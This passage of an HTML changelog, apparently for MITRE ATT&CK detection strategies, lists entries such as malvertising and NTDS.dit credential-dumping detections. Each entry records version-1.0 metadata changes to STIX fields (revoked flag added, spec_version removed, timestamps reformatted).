16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0836] Detection of Malvertising</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0845] Detection of Malware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0872] Detection of Malware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0439] Detection of Malware Relocation via Suspicious File Movement</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0117] Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0158] Detection of Msiexec Abuse for Local, Network, and DLL Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0215] Detection of Multi-Platform File Encryption for Impact</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0132] Detection of Mutex-Based Execution Guardrails Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0586] Detection of NTDS.dit Credential Dumping from Domain Controllers</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0859] Detection of Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0889] Detection of Network Security Appliances</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0819] Detection of Network Topology</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0828] Detection of Network Trust Dependencies</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0457] Detection of Non-Application Layer Protocols for C2</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0850] Detection of Obtain Capabilities</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0040] Detection of Persistence Artifact Removal Across Host Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: 